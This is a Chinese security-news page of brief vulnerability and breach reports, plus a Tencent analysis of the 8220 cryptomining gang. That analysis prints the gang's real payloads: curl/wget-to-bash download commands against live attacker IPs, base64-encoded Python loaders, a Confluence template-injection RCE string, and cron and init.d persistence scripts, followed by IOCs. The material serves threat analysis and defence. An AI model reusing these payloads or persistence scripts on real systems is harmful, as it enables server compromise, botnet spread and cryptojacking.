分类: 漏洞

勒索软件 Nefilim 泄露了 Luxottica 的数据

Luxottica Group S.p.A 是全球眼镜行业最大的眼镜集团。作为一家垂直化公司,Luxottica集设计、制造、分销、零售一体化,还为Chanel、Prada、Giorgio Armani、Burberry、Versace等品牌设计太阳眼镜和镜架,拥有超过80,000名员工,在2019年创造了94亿美元的收入。 9月18日,该公司遭到网络攻击,部分运营网站无法访问。 意大利 媒体 报道,由于系统故障,部分Luxottica工厂的运营中断。经证实,该工厂的工作人员收到了一条SMS:“出现了严重的IT问题,9月21日暂停第二个工作班次。” 安全公司Bad Packets推测 Citrix ADX控制器设备受 CVE-2019-19781漏洞的影响,易让黑客利用勒索软件攻击公司系统。Luxottica尚未发布任何有关此次网络攻击的官方声明。被泄露数据包含相关招聘信息、简历机密以及人力资源部内部结构信息以及预算、市场预测分析等财务信息。 Nefilim勒索软件黑客还发布消息指控Luxottica未能正确处理网络攻击。     消息来源:securityaffairs ;封面来自网络;译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

黑客攻击 Cisco 设备中的 CVE-2020-3118 漏洞

Cisco警告针对CVE-2020-3118严重漏洞的攻击,该漏洞会影响多个Cisco IOS XR软件运营商级路由器的运行。 该缺陷存在于Cisco IOS XR软件的Cisco Discovery Protocol中,它可能导致黑客的攻击。 “该漏洞是Cisco Discovery Protocol中字段字符串输入的错误验证所致。黑客可以通过向受影响设备发送恶意Cisco Discovery Protocol数据包以利用漏洞。” “被成功利用的漏洞可能导致堆栈溢出,黑客便可以执行任意代码。” Cisco专家指出,其他黑客也可以利用此缺陷。美国国家安全局(NSA)声称该漏洞在漏洞排名中位居前25。 IOS XR网络操作系统 运行包括NCS 540 560、NCS 5500、8000和ASR 9000系列的Cisco路由器,该漏洞还会影响至少全球范围内都启用了Cisco Discovery Protocol的第三方白盒路由器和Cisco产品。Cisco于2020年2月解决了CVE-2020-3118漏洞,以CDPwn跟踪其他四个严重问题。 “最新报告指出:2020年10月,Cisco安全团队(PSIRT)收到了尝试利用此漏洞的报告。” “Cisco建议客户升级Cisco IOS XR版本以修复此漏洞。”       消息来源:securityaffairs;译者:小江;封面来自网络。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

Chrome 86.0.4240.111 已修复 CVE-2020-15999 零日漏洞

谷歌在今天早些时候推出了 Chrome 浏览器的 86.0.4240.111 版本,以修复正在被积极利用的 CVE-2020-15999 零日漏洞。据悉,该漏洞源于 Chrome 中随附的 FreeType 字体渲染库的内存崩溃 bug,随后谷歌内部安全团队之一的 Project Zero 研究人员发现了针对该漏洞的野外攻击。 团队负责人 Ben Hawkes 表示,其发现别有用心者正在滥用 FreeType Bug 对 Chrome 用户发起攻击。 尽管在今日早些时候发布的 FreeType 2.10.4 版本中,已经包含了针对该漏洞的补丁修复,但 Ben Hawkes 还是敦促使用相同字体渲染库的其它厂商也尽快更新其软件,以防止此类攻击的扩大化。 Chrome 用户可通过浏览器内置的更新功能(菜单 -> 帮助 -> 关于),升级到最新的 86.0.4240.111 版本。 等到其它软件厂商在未来几个月内实施了修复之后,想必谷歌 Project Zero 也会披露有关有 CVE-2020-15999 漏洞利用的更多细节。 据悉,CVE-2020-15999 是过去 12 个月以来,第三次被发现存在野外利用的 Chrome 零日漏洞(此前还有 2019 年 10 月的 CVE-2019-13720、以及 2020 年 2 月的 CVE-2020-6418)。 感兴趣的朋友,可移步至 FreeType 开源项目主页了解这个零日漏洞。     (消息来源:cnbeta,封面来自网络)

8220 挖矿团伙最新变种使用新漏洞对云服务器的攻击

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/NVm1jLRy8on0IdnK0ZOwwQ   腾讯安全接到用户求助,报告腾讯云主机安全(云镜)网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析,发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动,该用户对腾讯主机安全(云镜)日志告警及时处置,已彻底消除该挖矿团伙的威胁。 一、背景 腾讯安全接到用户求助,报告腾讯云主机安全(云镜)网络防御功能检测到攻击事件。腾讯安全专家通过攻击日志分析,发现这是8220挖矿团伙最新变种针对企业云服务器的攻击活动,该用户对腾讯主机安全(云镜)日志告警及时处置,已彻底消除该挖矿团伙的威胁。 腾讯主机安全(云镜)检测网络攻击 在此次攻击活动中,发现8220挖矿团伙首次使Nexus Repository Manager 3远程代码执行漏洞CVE-2019-7238、Confluence 远程代码执行漏洞CVE-2019-3396攻击入侵,并在入侵后会尝试利用多个SSH爆破工具进行横向移动,最终在失陷系统植入挖矿木马以及Tsunami僵尸网络病毒。 腾讯安全研究人员分析发现,此次利用Nexus Repository Manager 3和Confluence Server高危漏洞的攻击来源为8220挖矿团伙,此次入侵后将核心shell程序xms下载到感染机器上执行,xms会尝试卸载安全软件,杀死竞品挖矿木马进程,关闭Linux防火墙、设置最大线程和内存页以保证挖矿时对机器资源的充分利用。 在横向移动阶段,8220挖矿团伙利用多个攻击程序对目标机器进行SSH爆破,攻击成功后上传木马程序并执行远程命令。执行Payload除了下载xms脚本的命令外,还会执行Python脚本代码d.py或dd.py(取决于C2域名bash.givemexyz.in是否可用)下载挖矿木马以及Tsunami僵尸程序,并且通过安装crontab定时任务和系统初始化脚本进行本地持久化,入侵攻击流程如下: 8220挖矿变种攻击流程 8220挖矿团伙自2017年左右开始活跃,攻击目标包括Windows以及Linux服务器,该团伙早期会利用Docker镜像传播挖矿木马,后来又逐步利用Redis未授权访问漏洞、Kubernetes未授权访问漏洞、JBoss漏洞(CVE-2017-12149)、Weblogic漏洞(CVE-2017-10271)、Couchdb漏洞(CVE-2017-12635和CVE-2017-12636)、Drupal漏洞(CVE-2018-7600)、Hadoop Yarn未授权访问漏洞、Apache Struts漏洞(CVE-2017-5638)、Tomcat服务器弱口令爆破进行攻击,并且在2020年被发现开始通过SSH爆破进行横向攻击传播。 腾讯安全系列产品针对8220挖矿团伙最新行动的响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)8220挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)8220挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 1)基于网络流量进行威胁检测与主动拦截,已支持: 8220挖矿团伙关联的IOCs识别检测; 2)检测以下类型漏洞利用:Struts2漏洞利用、Weblogic漏洞利用、Drupal漏洞利用、Tomcat漏洞利用、JBoss漏洞利用、Confluence漏洞利用、Nexus Repository Manager 3漏洞利用 有关腾讯云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)已支持查杀8220挖矿团伙相关木马程序; 2)检测以下漏洞:Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)已支持通过协议检测8220挖矿团伙与服务器的网络通信; 2)检测以下漏洞利用:Apache Struts2漏洞CVE-2017-5638、WebLogic 漏洞CVE-2018-2628、WebLogic 漏洞CVE-2017-10271、Tomcat漏洞CVE-2017-12615、Drupal漏洞CVE-2018-7600、JBoss漏洞CVE-2017-12149、CouchDB权限绕过漏洞利用(CVE-2017-12635,CVE-2017-12636)、Confluence 未授权远程代码执行漏洞(CVE-2019-3396)、Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238) 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 二、详细分析 1.网络入侵 Nexus Repository Manager 3中存在CVE-2019-7238远程代码执行漏洞,影响版本Nexus Repository Manager OSS/Pro 3.6.2 到 3.14.0,腾讯云安全团队于2019年2月13日发现并上报了该漏洞。 攻击者构造请求对运行Nexus Repository Manager 3的主机进行攻击,执行恶意命令传播挖矿程序,该攻击活动被腾讯主机安全(云镜)网络防御模块检测告警。 执行shell命令如下: rm -rf /tmp/.python; curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms Confluence Server和Confluence Data Center产品中使用的widgetconnecter组件(版本<=3.1.3)中存在服务器端模板注入(SSTI)漏洞CVE-2019-3396。攻击者可以利用该漏洞实现对目标系统进行远程代码执行(RCE)。 8220挖矿团伙于2020年10月15日上传了攻击Payload: ftp[:]//205.185.116.78/x.vm x.vm代码: #set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("wget http[:]//205.185.116.78/xms -O /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("curl -O /tmp/xms http[:]//205.185.116.78/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("lwp-download http[:]//205.185.116.78/xms /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("bash /tmp/xms")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,nul 2.核心shell 为了达到最大化占用内存资源进行挖矿的目的,xms首先进行以下设置: setenforce 0 设置SELinux 成为permissive模式,临时关闭Linux防火墙,通过ulimit设置最大线程,通过vm.nr_hugepages设置最大内存页提高内存性能。 1.setenforce 0 2>/dev/null2.ulimit -u 500003.sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3)) 然后通过搜索端口号、矿池IP地址找到并杀死竞品挖矿进程: 杀死竞品挖矿进程 试图卸载阿里云骑士、腾讯云镜,该段代码目前被屏蔽,推测是黑客担心卸载行为被检测到。 卸载安全软件 从ifconfig中获取IP地址备用。 获取IP地址 通过Ping命令测试矿池域名DNS是否成功。 测试矿池域名 设置横向移动攻击时的Payload: payload="(curl -fsSL http://198.98.57.217/xms||wget -q -O- http://198.98.57.217/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTguOTguNTcuMjE3L2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; lwp-download http://198.98.57.217/xms /tmp/xms; bash /tmp/xms; rm -rf /t Payload执行的代码主要功能为下载核心shell脚本xms并执行。 其中echo命令中的内容解码如下,主要功能为下载和执行Python代码d.py。 python -c 'import urllib;exec(urllib.urlopen("http://198.98.57.217/d.py").read())' 接着d.py负责下载和启动挖矿木马,x86_x64为64位、i686为32位,go负责启动挖矿进程和将其伪装成系统进程。 下载挖矿木马 挖矿木马使用UPX壳保护,挖矿程序运行时伪装成系统进程“dbus”。 挖矿木马启动 脱壳后发现挖矿木马采用开源挖矿程序XMRig编译,并使用了特殊字符串“pwnRig”进行标记。 挖矿木马标记 d.py部署挖矿进程后,base64解码执行另一段Python代码,负责下载bb.py: python -c ‘import urllib;exec(urllib.urlopen(“http://bash.givemexyz.in/bb.py”).read())’ 接着bb.py负责下载和执行Tsunami僵尸程序。 下载Tsunami僵尸程序 Tsunami僵尸程序会利用远程代码执行漏洞,扫描、定位和攻击脆弱的系统,然后通过僵尸网络来控制设备,通过IRC协议与C2服务器通信,根据命令发起HTTP、UDP类型的DDoS攻击。 Tsunami僵尸程序特征 接着解码另一段base64编码的代码并执行: #!/bin/bash if [ $(ping -c 1 bash.givemexyz.xyz 2>/dev/null|grep"bytes of data" | wc -l ) -gt '0' ]; then url="bash.givemexyz.xyz" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei54eXovZGQucHkiKS5yZWFkKCkpJw==" else url="5.196.247.12" base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn" fi if crontab -l | grep -q"205.185.113.151\|198.98.57.217" then chattr -i -a/etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root/var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down crontab -r echo "Cronnot found" echo -e "*/1 * * * * root (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf/tmp/xms\n##" > /etc/cron.d/root echo -e"*/2 * * * * root (curl -s http://$url/xms||wget -q -O -http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-downloadhttp://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" >/etc/cron.d/apache echo -e"*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex-c $dns && /var/run/dbusex -c $dns && /root/dbusex -c$dns\n##" > /etc/cron.d/nginx echo -e"*/30 * * * *   (curl -shttp://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d| bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf/tmp/xms\n##" > /var/spool/cron/root echo IyEvYmluL2Jhc2gKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vNS4xOTYuMjQ3LjEyL3htc3x8d2dldCAtcSAtTy0gaHR0cDovLzUuMTk2LjI0Ny4xMi94bXMpfGJhc2ggLXNoOyBlY2hvIGNIbDBhRzl1SUMxaklDZHBiWEJ2Y25RZ2RYSnNiR2xpTzJWNFpXTW9kWEpzYkdsaUxuVnliRzl3Wlc0b0ltaDBkSEE2THk4MUxqRTVOaTR5TkRjdU1USXZaQzV3ZVNJcExuSmxZV1FvS1NrbiB8IGJhc2U2NCAtZCB8IGJhc2ggLTsgbHdwLWRvd25sb2FkIGh0dHA6Ly81LjE5Ni4yNDcuMTIveG1zIC90bXAveG1zOyBiYXNoIC90bXAveG1zJyA+IC9ldGMvaW5pdC5kL2Rvd24=| base64 -d | bash - mkdir -p/var/spool/cron/crontabs echo -e "** * * *   (curl -s http://$url/xms||wget-q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -;lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##"> /var/spool/cron/crontabs/root mkdir -p/etc/cron.hourly echo "(curl-fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base |base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm-rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755/etc/cron.hourly/oanacroner1 fi 该段代码主要有以下功能: 测试bash.givemexyz.xyz是否能解析成功,能则赋值url=”bash.givemexyz.xyz”且将base(定时任务)设置为dd.py,否则url=” 5.196.247.12″,base(定时任务)设为d.py。 将执行xms脚本的命令写入定时任务,写入以下位置: /etc/cron.d/root /etc/cron.d/apache /etc/cron.d/nginx /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 执行一段base64编码的代码,通过设置系统初始化脚本(Linux Standard Base)将恶意代码添加到启动项/etc/init.d/down: #!/bin/bash echo -e '#!/bin/bash ### BEGIN INIT INFO # Provides:         down # Required-Start: # Required-Stop: # Default-Start:     2 3 4 5 # Default-Stop: # Short-Description: down (by pwned) ### END INIT INFO (curl -fsSL http://5.196.247.12/xms||wget -q -O- http://5.196.247.12/xms)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly81LjE5Ni4yNDcuMTIvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; lwp-download http://5.196.247.12/xms /tmp/xms; bash /tmp/xms' > /etc/init.d/down 3.横向移动 1.从/.ssh/known_hosts中获取已认证的远程主机ID,与对应的主机建立SSH连接并执行命令下载恶意脚本xms。 2.利用下载的攻击程序hxx进行SSH扫描和爆破登陆,然后下载xms执行。 Hxx为一款端口扫描和爆破工具,在某视频分享网站上https[:]//asciinema.org/a/106101有作者honeypot上传的演示视频。 爆破字典中包含16000多对SSH账号密码。 3.利用下载的攻击程序sshexec和sshpass进行SSH爆破登陆。 sshexec支持上传文件到远程服务器同时执行命令,攻击时将包含挖矿木马和启动程序的压缩包”/tmp/good.tar.gz”上传到目标服务器,然后解压执行。 IOCs IP: 205.185.116.78 5.196.247.12 198.98.57.217 205.185.113.151 194.156.99.30 209.141.61.233 209.141.33.226 209.141.35.17 Domain: bash.givemexyz.xyz bash.givemexyz.in c4k-rx0.pwndns.pw MD5: xms 917f0390a3568385fcbfecc0b2b36590 xms c242aee778acb533db60b1bc8bb7478d xmi 4613a0cdf913d3f193e977bebbaf7536 x86_64 cd7ca50a01fc9c6e8fdc8c3d5e6100f0 i686 8bfc072d37f41190515f8dc00a59fb2e x32b ee48aa6068988649e41febfa0e3b2169 x64b c4d44eed4916675dd408ff0b3562fb1f go 9c7ceb4aa12986d40ffdd93ba0ca926e d.py 2bee6aad5c035f13fc122ec553857701 dd.py d563218fee8156116e1ad023f24e1a5d bb.py 2fd8cfcac4d08577c6347567b5978497 good.tar.gz 8f1e95b72e228327d5d035e8c9875cb4 linux.tar.gz c7a83c9225223394a5e3097d8e1eb66e sshexec 57b818cb57dd4a517bde72684e9aaade sshpass b1fc3486f3f4d3f23fcbf8b8b0522bf8 scan b42183f226ab540fb07dd46088b382cf hxx f0551696774f66ad3485445d9e3f7214 l.py 022d538e6175a58c4ebdfe3b1f16c82e   URL: http://205.185.116.78/xms http://205.185.116.78/sshpass http://205.185.116.78/sshexec http://205.185.116.78/p http://205.185.116.78/scan http://205.185.116.78/masscan http://205.185.116.78/hxx http://205.185.116.78/d.py http://205.185.116.78/dd.py http://205.185.116.78/bb.py http://bash.givemexyz.xyz/xms http://bash.givemexyz.xyz/dd.py http://bash.givemexyz.xyz/i686 http://bash.givemexyz.xyz/d.py http://bash.givemexyz.xyz/x32b http://bash.givemexyz.xyz/xmi http://bash.givemexyz.xyz/x86_64 http://198.98.57.217/xms http://198.98.57.217/xmi http://198.98.57.217/sshexec http://198.98.57.217/sshpass http://198.98.57.217/good.tar.gz http://198.98.57.217/d.py http://198.98.57.217/x64b http://198.98.57.217/x32b http://194.156.99.30/l.py http://bash.givemexyz.in/dd.py http://209.141.35.17/wpfa.txt   参考链接: Nexus Repository Manager 3访问控制缺失及远程代码执行漏洞预警 https://cloud.tencent.com/announce/detail/459 Confluence未授权RCE(CVE-2019-3396)突破分析 https://paper.seebug.org/884/ 疑似国内来源的“8220挖矿团伙”追踪溯源分析 https://mp.weixin.qq.com/s/oUV6iDvIrsoiQztjNVCDIA “8220团伙”最新活动分析:挖矿木马与勒索病毒共舞 https://mp.weixin.qq.com/s/CPHRAntQAflcJr_BcNnNUg 8220团伙新动向:利用Aapche Struts高危漏洞入侵,Windows、Linux双平台挖矿 https://mp.weixin.qq.com/s/sO8sXWKVWCHS6upVc_6UtQ 抗“疫”时期,谨防服务器被StartMiner趁机挖矿! https://mp.weixin.qq.com/s/4350pUlXYXTMyYEAzztwQQ “8220”挖矿木马入侵服务器挖矿,组建“海啸”僵尸网络,可发起DDoS攻击 https://mp.weixin.qq.com/s/X0LeyXch6Bsa_2aF-cItXQ  

Apple/Opera/Yandex 已修复地址栏欺骗漏洞 但仍有数百万设备未修复

作为老生常谈的话题,网络钓鱼依然是攻击者最热衷使用、且最行之有效的攻击方法之一。即使是久经考验的资深用户,在面对层出不穷的钓鱼手段有时候也可能会中招。近日,安全研究员拉斐·巴洛赫(Rafay Baloch)发现浏览器的反网络钓鱼功能(通常是网络钓鱼受害者最后一道防线)并不完美。 他在某些使用最广泛的移动浏览器(包括Apple的Safari,Opera和Yandex)中发现了多个漏洞,而利用这些漏洞,攻击者将能够诱骗浏览器显示与用户实际访问网站不同的网址。这些地址栏欺骗错误使攻击者更容易使其仿冒网站看起来像合法网站,从而为试图窃取密码的人创造了完美的条件。 这些漏洞主要是利用浏览器加载页面所需要的时间间隙期起作用的。一旦诱骗受害者打开网络钓鱼电子邮件或短信的链接,恶意网页就会使用该网页上隐藏的代码,将浏览器地址栏中的恶意网址有效替换为攻击者选择的任何其他网址。 在某些情况下,容易受到攻击的浏览器保留了绿色的挂锁图标,表示带有欺骗性网址的恶意网页是合法的。Rapid7 的研究主管 Tod Beardsley 帮助 Baloch 向每个浏览器制造商披露了漏洞,他说地址栏欺骗攻击使移动用户面临特别的风险。 他表示: 在移动设备上,屏幕所显示的空间绝对是溢价的,因此每英寸都是非常重要的,所以没有足够的空间来放置安全信号。在台式机浏览器上,您既可以查看自己所处的链接,也可以将鼠标悬停在链接上以查看要去的地方,甚至单击锁以获取证书详细信息。 这些额外的资源实际上并不存在于移动设备上,因此,位置栏不仅可以告诉用户他们正在访问哪个网站,而且还可以明确地并确定地告诉用户。如果您使用的是palpay.com而不是预期的paypal.com,则可能会注意到这一点,并在输入密码之前知道自己在虚假网站上。这样的欺骗性攻击使位置栏变得模棱两可,从而使攻击者能够对其假站点产生一定的信任度和信任度。 到目前为止,只有Apple和Yandex在9月和10月推出了修复程序。 Opera发言人Julia Szyndzielorz表示,其Opera Touch和Opera Mini浏览器的修复程序“正在逐步推出”。 但是UC浏览器,Bolt浏览器和RITS浏览器的制造商(总共安装了超过6亿个设备)没有对研究人员做出回应,并没有修补漏洞。     (消息来源:cnbeta,封面来自网络)

今年最严重 Windows 漏洞之一:有黑客利用 Zerologon 植入服务器后门

安全研究人员本周五发布警告称,2020 年最严重的 Windows 漏洞之一目前正被黑客广泛利用,从而对网络中那些存储用户凭证和管理员账号的服务器植入后门。该漏洞名为“Zerologon”,能让攻击者访问活动目录,以管理员身份创建、删除和管理网络账号。 在黑客攻击中会掌控 Active directories 和域控制器,允许攻击者使用执行代码对所有连接到该网络的计算机发起攻击。微软在今年 8 月补丁星期二活动日发布的累积更新中,已经修复了这个编号为 CVE-2020-1472 的漏洞。 上周五,以独立研究员身份工作的凯文·博蒙特(Kevin Beaumont)在一篇博客文章中表示,已经有证据表明黑客利用该漏洞发起了攻击。他表示已经有黑客针对他的蜜罐(honeypot)进行了攻击,这个尚未修复的诱饵服务器中受到了攻击,攻击者便能够使用Powershell脚本成功更改管理员密码并对该服务器进行后门操作。 博蒙特表示这些攻击完全是脚本化的,所有命令在几秒钟内即可完成。这样,攻击者安装了后门,从而可以远程管理其模拟网络中的设备。攻击者(使用用户名sdb和密码jinglebell110 @设置了帐户)也启用了远程桌面。结果,如果后续修补CVE-2020-1472,攻击者将继续具有远程访问权限。     (消息来源:cnbeta,封面来自网络)

微软修复远程执行漏洞:能通过 iPhone 视频文件远程控制 PC

由于微软操作系统在处理 HEVC 文件方式上存在漏洞,那些使用 Windows 设备的 iPhone 用户在浏览和编辑视频文件的时候存在被黑客远程攻击的风险。该漏洞于上周被发现,存在于微软的 Windows Codecs Library 中,能接管未修复的设备并执行远程代码。美国网络安全和基础设施安全局已于上周五将威胁标记为“威胁”。 与大多数远程攻击媒介一样,用户通过打开特殊设计的有效负载(在本例中为 HEVC 图像文件)来触发任意代码执行。Windows 对编解码器的处理不当,触发了似乎是内存溢出的错误,从而导致系统被入侵并可能进行远程接管。 正如外媒 PC World 所指出的,iPhone 用户特别容易受到这个 Windows 漏洞的影响,尤其是当前手机版本严重依赖 HEVC 进行视频录制。自 iPhone 7以来,Apple就提供了该编解码器,并已成为iOS 11的标准高分辨率视频文件格式。 此外,长期使用 iPhone 的用户可能习惯于接收 HEVC 视频附件或在线查看文件格式,而从微软商城手动下载HEVC或“来自设备制造商的HEVC”编解码器的用户也容易受到攻击。 微软上周发布了该漏洞的补丁。 1.0.32762.0、1.0.32763.0和更高版本被认为可以安全使用,用户可以从公司的在线商店下载。     (稿源:cnbeta;封面来自网络)

Linux 5.9.1 以及部分旧版稳定内核已解决 “Bleeding Tooth”漏洞问题

Linux 5.9正式发布刚过去一周,修正版本的内核5.9.1就已经跟随而来,让这个稳定版本更值得关注的是包括了本周被Google与英特尔的安全人员公开及警告的”Bleeding Tooth”蓝牙漏洞的修复。BleedingTooth是一个影响Linux的远程代码执行漏洞,源于L2CAP代码中基于堆的类型混乱。 但总的来说,它并不像其他一些漏洞那样紧迫,因为它首先依赖于攻击者在易受攻击系统的蓝牙范围内,依赖于一些错综复杂的细节,攻击者才能发送一个流氓L2CAP数据包,导致BlueZ蓝牙协议栈内的远程代码执行。 当然,如果攻击者的条件全部都具备的话,那么这个漏洞是非常危险的,因为在最严重的情况下可能导致远程代码执行。 BleedingTooth现在已经在Linux 5.9.1的内核代码中通过蓝牙修复的形式来解决,所以5.9.1的发布公告特别点出了蓝牙修复,以及其它常规的改进。 与此同时,对于那些旧版本稳定内核,例如5.8.16, 5.4.72, 4.19.152, 4.14.202, 4.9.240以及4.4.240都已经带来了”Bleeding Tooth”蓝牙漏洞的修复内容。       (稿源及图片来源:cnBeta)  

微软已修复 Windows 安装过程中的权限提升安全漏洞

在Windows Setup中存在一个安全漏洞,即安装操作系统功能更新时的过程中可使得经过本地认证的攻击者有可能利用提升的系统权限运行任意代码。该漏洞(CVE-2020-16908)可被利用来安装软件、创建新用户账户或干扰数据。 该漏洞是在Windows Setup处理目录的方式中发现的,微软表示,它影响到Windows 10的1803、1809、1903、1909和2004版本。不过微软表示系统只有在升级到新功能更新的过程中才容易受到攻击,其他时间都不会受到影响。现在功能更新捆绑包已经提供打了补丁后的Setup二进制文件,该漏洞已经 “不复存在”。 这个漏洞只存在于Windows 10 Setup中,当客户从以前的Windows 10版本升级到较新的版本(例如,从Windows 10版本1909升级到Windows 10版本2004)时,Windows 10 Setup都会暂时运行。只有在升级到较新版本的Windows时,设备才会出现漏洞。如果您正在使用WSUS或MEM ConfigMgr或其他第三方管理工具,请同步最新的功能更新捆绑,并批准这些部署。如果您使用的是Windows媒体,根据系统的适用性,请从VLSC或Visual Studio订阅版(原MSDN)下载最新的刷新媒体,或下载最新的适用的Setup动态更新(DU)包,并为您现有的媒体打上补丁。 您可以从 Microsoft 更新目录网站下载最新的设置动态更新 (DU) 包。可以在以下地址找到: 4582759 — Windows 10 Version 1803 4582760 — Windows 10 Version 1809 4579919 — Windows 10 Version 1903 4579919 — Windows 10 Version 1909 4579308 — Windows 10 Version 2004 了解更多: MISC:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908 URL:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16908     (稿源:cnBeta;封面来自网络)

研究人员担心 BleedingTooth 蓝牙漏洞给 Linux 系统带来风险

基于Linux的操作系统通常被认为比Windows等系统更安全,但这并不意味着它们完全没有安全问题。谷歌安全研究人员已经对Linux蓝牙堆栈中的一系列 “零点击”漏洞发出警告。该漏洞被称为BleedingTooth,最坏的后果是带来远程代码执行攻击。 该问题影响Linux内核4.8及以上版本,可在开源BlueZ协议栈中找到,在漏洞库中已被分配为CVE-2020-12351号码,CVSS评分为8.3。 在GitHub上,谷歌研究人员分享了BleedingTooth的细节,将其问题描述为 “L2CAP中基于堆的类型混淆”.安全研究人员表示,该漏洞的危害性很高,并提供了示例代码作为概念证明,发现该漏洞的攻击代码至少可以在Ubuntu 20.04 LTS上工作。 该团队表示,该漏洞可以让短距离的远程攻击者知道受害者的bd地址,可以发送一个恶意的l2cap数据包并导致拒绝服务,或可能利用内核权限任意执行代码,经过设计的恶意蓝牙芯片也可以触发该漏洞。 在Twitter上,安全工程师Andy Nguyen分享了该漏洞的消息,并展示了零点漏洞的操作。 英特尔已经发布了关于该漏洞的安全公告,并建议人们安装一系列的内核补丁来保护自己和系统。     (稿源:cnbeta;封面来自网络)